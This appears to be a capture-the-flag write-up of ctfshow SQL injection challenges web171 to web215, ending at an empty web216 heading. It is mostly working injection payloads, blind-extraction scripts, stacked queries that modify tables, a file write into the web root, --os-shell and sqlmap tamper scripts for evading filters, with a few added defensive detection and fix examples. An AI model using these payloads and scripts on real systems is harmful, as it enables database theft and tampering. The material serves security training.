ctfshow - Web basics (web入门): SQL injection 171-253

web171

Check whether the parameter is injectable

Use the comment sequence --+ (the + stands for a space), or use %23 as the comment marker: 1' and 1=1%23

Use order by to find the number of columns

order by sorts on a given column. 1' order by 3--+ returns normally;

1' order by 4--+ returns no data, so there are 3 columns.

Use union select to find which columns are echoed

The echo positions are 1, 2, 3

Query the database name

1' union select 1,2,database()--+   database name: ctfshow_web

Query the column names

1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+

Query the data in the table

1'union select id,username,password from ctfshow_user --+   which gives the flag

web172

The flag is in another table, ctfshow_web2, which has only two columns

-1' union select to_base64(username),hex(password) from ctfshow_user2 --+   encode the output to get past the filter, then decode it to obtain the flag

web173

Three columns are echoed; encode the output: 1' union select id,hex(username),hex(password) from ctfshow_user3--+

web174

flag and digits are filtered; there are two columns. Payload: 1' union select REPLACE(username,'g','j'),REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(REPLACE(password,'1','A'),'2','B'),'3','C'),'4','D'),'5','E'),'6','F'),'7','G'),'8','H'),'9','I'),'0','J'),'g','j') from ctfshow_user4 where username='flag' limit 1,1 --+   then map the substituted characters back.

Blind injection also works.

Script by an experienced player:

# @Author:Y4tacker
import requests

url = "http://e076200d-5e74-4121-b2fc-04153243f7a3.chall.ctf.show/api/v4.php?id=1' and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select  password from ctfshow_user4 limit 24,1),{i},1))>{mid},1,0) -- -'
        r = requests.get(url + payload)
        if "admin" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)


web175

Nothing is displayed at all.

Time-based injection works. Payload: 1' and if(1=1,sleep(3),1)--+   Write a script:

import requests
url="http://be3b1c4d-62d4-4ec4-8ca4-ca893b90126c.challenge.ctf.show:8080/api/v5.php?id=1' and "
flag=''
ind=0
while True:
    ind+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail) >> 1
        payload=f'if(ascii(substr((select  password from ctfshow_user5 limit 24,1),{ind},1))>{mid},sleep(1),0) -- '
        try:
            r=requests.get(url+payload, timeout=0.5)
            tail=mid
        except:
            head=mid+1

    if head != 32:
        flag+=chr(head)
    else:
        break
    print(flag)

The query result can also be written to a file under the web root. Payload: 1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

web176

The usual test shows 3 columns; bypass the filter on union select with mixed case

1' uNion sElect 1,2,password from ctfshow_user --+   or use a "universal password" (万能密码)

web177

Spaces are filtered; bypass with /**/

Use %23 as the comment marker

1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user/**/where/**/username/**/='flag'%23

web178

Spaces and * are filtered; use %09 in place of spaces: 1'%09order%09by%092%23   1'%09union%09select%091,2,password%09from%09ctfshow_user%23

web179

Spaces are filtered and so is %09

id=1'or'1'='1'%23   using single quotes avoids the need for spaces (or use parentheses)

Or bypass the space filter with %0c: 1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23
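From the defender's side, the substitutions used in web176-179 (mixed case, /**/ comments, %09 or %0c in place of spaces, quote-delimited tautologies with no spaces at all) stop mattering once the parameter is canonicalised before any keyword matching. The following is an added example, not code from the original writeup: it normalises a request parameter the way MySQL's parser effectively sees it and runs a few signatures over constructed request strings; the signature names and the SAMPLES list are constructed here.

```python
import re
from urllib.parse import unquote_plus

# Constructed request strings modelled on the bypasses shown for web176-179,
# plus two benign ones that a naive keyword grep would flag.
SAMPLES = [
    "id=1' uNion sElect 1,2,password from ctfshow_user --+",
    "id=1'/**/union/**/select/**/password,1,1/**/from/**/ctfshow_user%23",
    "id=1'%09union%09select%091,2,password%09from%09ctfshow_user%23",
    "id=1'union%0cselect%0c1,2,password%0cfrom%0cctfshow_user%23",
    "id=1'or'1'='1'%23",
    "id=42",
    "q=union+station+selected+by+users",
]

SIGNATURES = {
    # union ... select with any blank/comment between them (already normalised to one space)
    "union-select": re.compile(r"\bunion\b(?:\s+(?:all|distinct)\b)?\s*\bselect\b"),
    # 'or'1'='1' style tautology that needs no whitespace at all
    "quoted-tautology": re.compile(r"'\s*(?:or|and)\s*'[^']*'\s*=\s*'"),
    # trailing comment used to swallow the rest of the original query
    "comment-tail": re.compile(r"(?:--\s|#)\s*$"),
    "schema-read": re.compile(r"\binformation_schema\b"),
}


def normalize(raw: str) -> str:
    """Canonicalise a parameter the way a filter must before matching keywords:
    URL-decode twice (catches double encoding), decoding as latin-1 so every %XX is
    exactly one character; drop /**/ comments; collapse every character MySQL treats
    as a blank (%09 %0a %0b %0c %0d %a0 and space) to one space; lower-case."""
    s = unquote_plus(unquote_plus(raw, encoding="latin-1"), encoding="latin-1")
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"[\t\n\x0b\x0c\r\xa0 ]+", " ", s)
    return s.lower()


def classify(raw: str) -> list:
    """Names of the signatures that fire on the normalised form of one parameter."""
    s = normalize(raw)
    return [name for name, rx in SIGNATURES.items() if rx.search(s)]


def scan(samples=SAMPLES) -> dict:
    """Classify every sample; benign inputs come back with an empty hit list."""
    return {s: classify(s) for s in samples}


if __name__ == "__main__":
    for raw, hits in scan().items():
        print(f"{'ALERT' if hits else 'ok   '} {raw!r} -> {hits}")
```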

web180

-1'or(id=26)and'a'='a

web181

The characters that can substitute for a space are filtered; same payload as above

web182

Same as above

web183

In the table-name and database-name position, backticks can be used so no space is needed. For a script, a regex can test one character at a time.

import requests
url = "http://17a4723c-db41-4360-afd9-405682abe24c.challenge.ctf.show:8080/select-waf.php"
flagstr="flag{0123456789-qwertyuiopkjhdszxcvbnm}"
flag=""
for i in range(5,50):
    for s in flagstr:
        data={
            "tableName":f"`ctfshow_user`where(substr(`pass`,{i},1)regexp('{s}'))"
        }
        re=requests.post(url, data)
        if(re.text.find("$user_count = 1;")>0):
            flag+=s
            print(flag)
            break

Another script

import requests
url = "http://17a4723c-db41-4360-afd9-405682abe24c.challenge.ctf.show:8080/select-waf.php"
flagstr="flag{0123456789-qwertyuiopkjhdszxcvbnm}"
flag="ctfshow{"
for i in range(50):
    for s in flagstr:
        data={
            "tableName":"(ctfshow_user)where(pass)like'{}%'".format(flag+s)
        }
        re=requests.post(url, data)
        if(re.text.find("$user_count = 1;")>0):
            flag+=s
            print(flag)
            break

web184

Spaces are not filtered; use group by with having for blind injection. Single quotes are filtered; bypass with hexadecimal.

import requests
def str_to_hex(st):
    return ''.join(hex(ord(s)).replace('0x', '') for s in st)

url="http://1d6e11cd-487e-4750-8231-03abbc9e1a70.challenge.ctf.show:8080/select-waf.php"
flagstr="flag{0123456789-qwertyuiopkjhdszxcvbnm}"
flag="ctfshow{"
for i in range(50):
    for s in flagstr:
        data={
            "tableName":"ctfshow_user group by pass having pass  like {}".format("0x"+str_to_hex(flag+s+'%'))
        }
        re=requests.post(url, data)
        if(re.text.find("$user_count = 1;")>0):
            flag+=s
            print(flag)
            break

web185

Digits are banned

import requests

def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num

def createStrNum(s):
    str=""
    str+="chr("+createNum(ord(s[0]))+")"
    for i in s[1:]:
        str+=",chr("+createNum(ord(i))+")"
    return str

url="http://f183a7ad-294c-474f-8c9a-8d535ee63fed.challenge.ctf.show:8080/select-waf.php"

flag="ctfshow{"
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        data={
            'tableName':"ctfshow_user group by pass having pass like(concat({}))".format(createStrNum(flag+j+"%"))
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 0;" not in r:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web186

Same as above

web187

Use username admin and password ffifdyop

The raw MD5 of ffifdyop, i.e. md5(str, true), is 'or'6�]��!r,��b

In MySQL, as long as the single-quoted string after the or starts with a digit, it is treated as true, so the login succeeds.
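The ffifdyop trick works because the raw digest starts with the bytes 'or'6 and is spliced into the query as text. The following added example (not from the original writeup) reproduces that with Python's hashlib and an in-memory SQLite table standing in for MySQL, since both treat a string literal with a leading digit as true in a boolean context, and shows the fix: compare the hex digest through a bound parameter. The table and account names are constructed.

```python
import hashlib
import sqlite3


def raw_md5(password: str) -> bytes:
    """What PHP's md5($pass, true) returns: the 16 raw digest bytes, not 32 hex chars."""
    return hashlib.md5(password.encode()).digest()


def vulnerable_sql(username: str, password: str) -> str:
    """Query built by string concatenation, in the shape the challenge uses. The raw
    digest is spliced into the SQL text; bytes are decoded as latin-1 so each byte
    becomes exactly one character (0x27 becomes a quote that closes the literal)."""
    digest = raw_md5(password).decode("latin-1")
    return f"select * from users where username = '{username}' and password = '{digest}'"


def login_vulnerable(conn, username, password):
    return conn.execute(vulnerable_sql(username, password)).fetchall()


def login_fixed(conn, username, password):
    """Hex digest plus bound parameters: whatever the digest contains, it is data, not SQL."""
    digest = hashlib.md5(password.encode()).hexdigest()
    return conn.execute(
        "select * from users where username = ? and password = ?", (username, digest)
    ).fetchall()


def make_db():
    # Constructed user table: two accounts whose real passwords are not 'ffifdyop'.
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    for user, pw in (("admin", b"constructed-admin-pw"), ("guest", b"constructed-guest-pw")):
        conn.execute("insert into users values (?, ?)", (user, hashlib.md5(pw).hexdigest()))
    return conn


def demo() -> dict:
    """The string-built query turns into ... password = ''or'6...' and matches every
    row; the parameterised query matches none."""
    conn = make_db()
    return {
        "raw_digest_prefix": raw_md5("ffifdyop")[:5],
        "sql_sent": vulnerable_sql("admin", "ffifdyop"),
        "rows_vulnerable": len(login_vulnerable(conn, "admin", "ffifdyop")),
        "rows_fixed": len(login_fixed(conn, "admin", "ffifdyop")),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=", v)
```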

web188

Username and password are both 0

When the user column holds strings but the user in the where clause is an integer, each user value is prefixed with 0 (i.e. converted to 0) before the comparison, so every row is returned.

The account returned thus has a leading 0, and the password is also 0, so the loose comparison succeeds and the login goes through.

web189

Blind injection based on the different responses for username 0 and username 1

import requests

url="http://149a11b0-c5bc-47b1-9a19-e4b7a0c897ee.challenge.ctf.show:8080//api/index.php"

flag="ctfshow{"
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

web190

Blind injection

1' or 1=1# returns "wrong password"; 1' or 1=2# returns "account does not exist"

import requests
url="http://488af20f-7098-4dce-adb9-cf7e7d2ccfd9.challenge.ctf.show:8080/api/"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # table names: ctfshow_fl0g,ctfshow_user
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names: id,f1ag
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload="select group_concat(f1ag) from ctfshow_fl0g"

        data={
            "username":f"1' or if(ascii(substr(({payload}),{i},1))>{mid},1,2)=1#",
            "password":"1"
        }
        rep=requests.post(url,data)

        if "密码错误" in rep.json()['msg']:
            head=mid+1
        else:
            tail=mid

    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web191

ascii is banned; use ord instead

import requests
url="http://4ecbdd5c-db9b-427a-98d8-74e3aafeb767.challenge.ctf.show:8080/api/"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # table names: ctfshow_fl0g,ctfshow_user
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names: id,f1ag
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload="select group_concat(f1ag) from ctfshow_fl0g"

        data={
            "username":f"1' or if(ord(substr(({payload}),{i},1))>{mid},1,2)=1#",
            "password":"1"
        }
        rep=requests.post(url,data)

        if "密码错误" in rep.json()['msg']:
            head=mid+1
        else:
            tail=mid

    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

ord can also be avoided entirely:

"username":f"1' or if(substr(({payload}),{i},1)>chr({mid}),1,2)=1#",
"password":"1"

web192

Same as the second method of the previous challenge

import requests
url="http://18e6f404-51c7-4220-b39b-2e52ecc73fd2.challenge.ctf.show:8080/api/"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # table names: ctfshow_fl0g,ctfshow_user
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names: id,f1ag
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        payload="select group_concat(f1ag) from ctfshow_fl0g"

        data={
            "username":f"1' or if(substr(({payload}),{i},1)>chr({mid}),1,2)=1#",
            "password":"1"
        }
        rep=requests.post(url,data)

        if "密码错误" in rep.json()['msg']:
            head=mid+1
        else:
            tail=mid

    if head!=32:
        flag+=chr(head)
        print(flag.lower())
    else:
        break

web193

substr is filtered; bypass with like or regexp

import requests
url="http://ad7d04ca-9287-401d-a74a-0276008372e4.challenge.ctf.show:8080/api/"
flag=''
flagstr='0123456789-{},qwertyuioplkjhgfdsazxcvbnm_'
i=0
while True:
    # table names: ctfshow_flxg,ctfshow_user
    #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
    # column names: id,f1ag
    #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
    payload = "select group_concat(f1ag) from ctfshow_flxg"
    for i in flagstr:
        data={
            "username":f"1' or if(({payload}) like '{flag+i}%',1,2)=1#",
            "password":1
        }
        rep=requests.post(url,data)
        # print(rep.json())
        # print(data)
        if "密码错误" in  rep.json()['msg']:
            flag+=i
            print(flag)
            break

web194

Same script as above; the locate() function can also be used

import requests
url="http://e10ba9ba-e60c-4c7e-8f92-9293534c7e85.challenge.ctf.show:8080/api/"
flag=''
flagstr='ctf0123456789-{},qweryuioplkjhgdsazxvbnm_'
i=0
while True:
    # table names: ctfshow_flxg,ctfshow_user
    #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
    # column names: id,f1ag
    #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'"
    payload = "select group_concat(f1ag) from ctfshow_flxg"
    for i in flagstr:
        data={
            "username":f"1' or if(locate('{flag+i}',({payload}))>0,1,2)=1#",
            "password":1
        }
        rep=requests.post(url,data)
        # print(rep.json())
        # print(data)
        if "密码错误" in  rep.json()['msg']:
            flag+=i
            print(flag)
            break

Note that in flagstr the three characters c, t, f must be placed at the front.

web195

payload="0;update ctfshow_user set pass=1"   then log in with username 0 or 0x61646d696e and password 1. Using 0 works for the same reason as before; hex is used because the challenge's SQL query does not wrap the username in single quotes.

web196

Username 1;select(1), password 1

web197

Rename the pass column to autumn and the id column to pass: 1;alter table ctfshow_user change pass autumn varchar(255); alter table ctfshow_user change id pass varchar(255)   then use 0 or 0x61646d696e as the username and brute-force the password with Burp starting from 1.

web198

Same as above

web199

1;show tables;   gives ctfshow_user

web200

Same as above

web201

Learning to use sqlmap. Enumerate databases: python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --dbs --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php

Enumerate tables: python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php -D "ctfshow_web" --tables

Enumerate columns: python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php -D "ctfshow_web" -T "ctfshow_user" --columns

Dump the field: python sqlmap.py -u http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/api/?id=1* --user-agent sqlmap --referer http://28444a72-82d6-495c-b544-732abef317ff.challenge.ctf.show:8080/sqlmap.php -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump

web202

python sqlmap.py -u http://33f5109e-d2a0-438f-abe4-39ed492b4270.challenge.ctf.show:8080/api/ --data="id=1" --referer="ctf.show" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump   use --data to switch to a POST request

web203

--method=PUT requires adding --headers="Content-Type: text/plain"

python sqlmap.py -u "http://836dec64-499b-4a0b-80ca-27a056c5f2bf.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump

web204

Add the cookie: python sqlmap.py -u "http://406f79f4-9974-4ad0-b345-d518d8f582a6.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=0r1o7m11nbljtm95t6holosfsi; ctfshow=fb18d052f4477293bd3580f0f20ede7d" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump

web205

Before the api can be accessed, a getToken endpoint has to be visited first; two parameters are needed:

--safe-url  sets a safe URL that is visited before the target address is tested
--safe-freq  sets how many injection requests are sent before safe-url is visited again

python sqlmap.py -u "http://e60d8c4c-cd7e-40cb-8904-b323fec20ec9.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump --safe-url="http://e60d8c4c-cd7e-40cb-8904-b323fec20ec9.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1

web206

Same as above: python sqlmap.py -u "http://d48a0400-0058-492b-8396-8080a076d2c2.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D "ctfshow_web" -T "ctfshow_user" --columns -C pass --dump --safe-url="http://d48a0400-0058-492b-8396-8080a076d2c2.challenge.ctf.show:8080/api/getToken.php" --safe-freq=1

web207

A first try at --tamper

space2comment.py: replaces the space character with the comment /**/

apostrophemask.py: replaces the apostrophe with its UTF-8 full-width counterpart

equaltolike.py: replaces the equals sign (=) with LIKE

space2dash.py: replaces the space character (' ') with a dash comment ('--') followed by a random string and a newline ('\n')

greatest.py: bypasses filtering of '>' by replacing the greater-than operator with GREATEST

space2hash.py: replaces the space character with a pound sign ('#') followed by a random string and a newline

apostrophenullencode.py: bypasses filtering of the apostrophe by replacing it with its illegal double-unicode counterpart

halfversionedmorekeywords.py: for MySQL, bypasses the firewall by adding a versioned MySQL comment before each keyword

space2morehash.py: replaces the space character with a pound sign ('#') followed by more random strings and a newline

appendnullbyte.py: appends an encoded NULL byte character at the end of the payload

ifnull2ifisnull.py: bypasses filtering of IFNULL by replacing 'IFNULL(A,B)' with 'IF(ISNULL(A), B, A)'

space2mssqlblank.py: (MSSQL) replaces the space character with another blank character

base64encode.py: replaces the payload with its Base64 encoding

space2mssqlhash.py: replaces the space character (MSSQL)

modsecurityversioned.py: against space filtering, wraps the complete query in a versioned comment

space2mysqlblank.py: replaces the space character with another blank character (MySQL)

between.py: replaces the greater-than operator (>) with BETWEEN

space2mysqldash.py: replaces the space character (' ') with a dash comment ('--') followed by a newline ('\n')

multiplespaces.py: adds multiple spaces around SQL keywords

space2plus.py: replaces the space character with a plus (+)

bluecoat.py: replaces the space character after SQL statements with a valid random blank character, then replaces = with LIKE

nonrecursivereplacement.py: doubles up SQL keywords to defeat non-recursive keyword replacement

space2randomblank.py: replaces the space character with a random blank character from the valid set

sp_password.py: appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs

chardoubleencode.py: double URL-encodes the payload (without processing already-encoded characters)

unionalltounion.py: replaces UNION ALL SELECT with UNION SELECT

charencode.py: URL-encodes the payload

randomcase.py: randomises the case of keyword characters

unmagicquotes.py: wide-character bypass of GPC addslashes

randomcomments.py: splits SQL keywords with /**/ comments

charunicodeencode.py: unicode-encodes the string

securesphere.py: appends a specially crafted string

versionedmorekeywords.py: bypass via versioned comments around keywords

Writing a tamper script

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal=""
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+="/**/"
        else:
            retVal+=payload[i]
    return retVal

Then put it in the sqlmap\tamper directory and pass --tamper=ctfshowweb207 to select the script.

python sqlmap.py -u http://d9774d58-9260-4693-861a-a028a947cb5a.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dbs --headers="Content-Type: text/plain" --safe-url=http://d9774d58-9260-4693-861a-a028a947cb5a.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshowweb207

Proxy through Burp to look at the payload:

python sqlmap.py -u http://d9774d58-9260-4693-861a-a028a947cb5a.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dbs --headers="Content-Type: text/plain" --safe-url=http://d9774d58-9260-4693-861a-a028a947cb5a.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshowweb207 --proxy=http://127.0.0.1:8080


Then dump the fields as usual.

web208

select and spaces are filtered; bypass select with mixed case

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal=""
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+="/**/"
        else:
            retVal+=payload[i]
    retVal=retVal.replace("select","SelEct")
    return retVal

python sqlmap.py -u http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --dbs  --headers="Content-Type: text/plain" --safe-url=http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshowweb207

python sqlmap.py -u http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flaxcac  --headers="Content-Type: text/plain" --safe-url=http://6737dc68-9bb8-44ef-84ec-e75b9130d6ef.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow208_tamper --columns -C flagvca --dump

web209

=, spaces and * are filtered; replace spaces with %0a and = with like

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal=""
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+=chr(0x0a)
        elif payload[i]=="=":
            retVal+=chr(0x0a)+'like'+chr(0x0a)
        else:
            retVal+=payload[i]
    retVal=retVal.replace("select","SelEct")
    return retVal

python sqlmap.py -u http://0a522aa3-13c7-4e43-8f50-fa0527795aed.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://0a522aa3-13c7-4e43-8f50-fa0527795aed.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow209_tamper -D ctfshow_web -T ctfshow_flav --columns  -C ctfshow_flagx --dump

web210

Encode the payload

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):

    retVal = payload

    if payload:
        retVal=retVal.encode()
        retVal=retVal[::-1]
        retVal=base64.b64encode(retVal)
        retVal=retVal[::-1]
        retVal=base64.b64encode(retVal)
    return retVal.decode()

str.encode() converts a string to bytes

python sqlmap.py -u http://b9d282da-1233-46c9-a2e9-15c0b6ed2b3e.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://b9d282da-1233-46c9-a2e9-15c0b6ed2b3e.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow210_tamper --dbs

web211

Same as the previous challenge, with an added filter on spaces

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload=pass_waf(payload)
    retVal = payload
    retVal = retVal.encode()
    retVal = retVal[::-1]
    retVal = base64.b64encode(retVal)
    retVal = retVal[::-1]
    retVal = base64.b64encode(retVal)
    return retVal.decode()

def pass_waf(payload):
    retVal=''
    for i in range(len(payload)):
        if payload[i]==" ":
            retVal+=chr(0x0a)
        else:
            retVal+=payload[i]
    return retVal

python sqlmap.py -u http://ff562c8d-d1ae-4d94-bbc8-07d2a04ea52c.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://ff562c8d-d1ae-4d94-bbc8-07d2a04ea52c.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow211_tamper --dbs

web212

Filtering of * added; same as above

python sqlmap.py -u http://f985196c-f4f4-43f8-8898-346205e223ff.challenge.ctf.show:8080/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql --headers="Content-Type: text/plain" --safe-url=http://f985196c-f4f4-43f8-8898-346205e223ff.challenge.ctf.show:8080/api/getToken.php --safe-freq=1 --tamper=ctfshow211_tamper --dbs
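The web210-212 tampers wrap each payload in reverse, base64, reverse, base64, so in access logs the id parameter looks like a random blob. The following added example (not part of the original writeup or of sqlmap) re-implements that transform only to build a sample capture, then shows the exact inverse that an analyst can run over a logged value to recover the SQL and list the keywords in it; the function names and the CAPTURED value are constructed.

```python
import base64
import re


def web211_obfuscate(payload: str) -> str:
    """Re-implementation of the page's web211 tamper, used here only to build sample
    input: spaces become %0a (newline) bytes, then reverse -> base64 -> reverse -> base64."""
    data = payload.replace(" ", "\n").encode()
    data = base64.b64encode(data[::-1])
    data = base64.b64encode(data[::-1])
    return data.decode()


def web211_deobfuscate(blob: str) -> str:
    """Exact inverse: undo the outer base64, reverse, undo the inner base64, reverse,
    then map the newline blanks back to spaces so the SQL reads normally."""
    data = base64.b64decode(blob, validate=True)
    data = base64.b64decode(data[::-1], validate=True)
    return data[::-1].decode().replace("\n", " ")


KEYWORDS = re.compile(r"\b(union|select|information_schema|sleep|benchmark|from)\b", re.I)


def inspect_id_param(value: str) -> dict:
    """For an analyst: try the two-layer decode on a captured id= value and report the
    recovered SQL plus the keywords it contains. Values that are not valid base64 or do
    not decode to text are reported unchanged (a legitimate numeric id stays as it is)."""
    try:
        decoded = web211_deobfuscate(value)
        layered = True
    except (ValueError, UnicodeDecodeError):
        decoded, layered = value, False
    return {
        "layered": layered,
        "decoded": decoded,
        "keywords": sorted({m.lower() for m in KEYWORDS.findall(decoded)}),
    }


# Constructed capture: the value the tamper would send for one probing payload.
CAPTURED = web211_obfuscate("1 and 1=1 union select 1,database() from information_schema.tables")

if __name__ == "__main__":
    print(inspect_id_param(CAPTURED))
    print(inspect_id_param("1"))
```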

web213

Use --os-shell

web214

Time-based blind injection; the injection point is the POST parameter ip of api/index.php

import requests
from time import time
url="http://0c216321-dea8-4208-882e-ac20fc4dc4b5.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # tables: ctfshow_flagx,ctfshow_info
        #payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # columns: id,flaga,info
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        payload="select flaga from ctfshow_flagx"
        data={
            'ip':f'if(ascii(substr(({payload}),{i},1))>{mid},sleep(2),1)',
            'debug':0
        }
        try:
            r=requests.post(url,data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web215

Single quotes are used this time

import requests
from time import time
url="http://33e24783-c02f-434c-bdc5-941131a9d9d9.challenge.ctf.show:8080/api/index.php"
flag=''
i=0
while True:
    i+=1
    head=32
    tail=127
    while head<tail:
        mid=(head+tail)>>1
        # table names
        payload="select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # column names
        #payload="select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'"
        #payload="select flaga from ctfshow_flagx"
        data={
            'ip':f"' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(2),1)#",
            'debug':0
        }
        try:
            r=requests.post(url,data,timeout=1)
            tail=mid
        except:
            head=mid+1
    if head!=32:
        flag+=chr(head)
        print(flag)
    else:
        break

web216

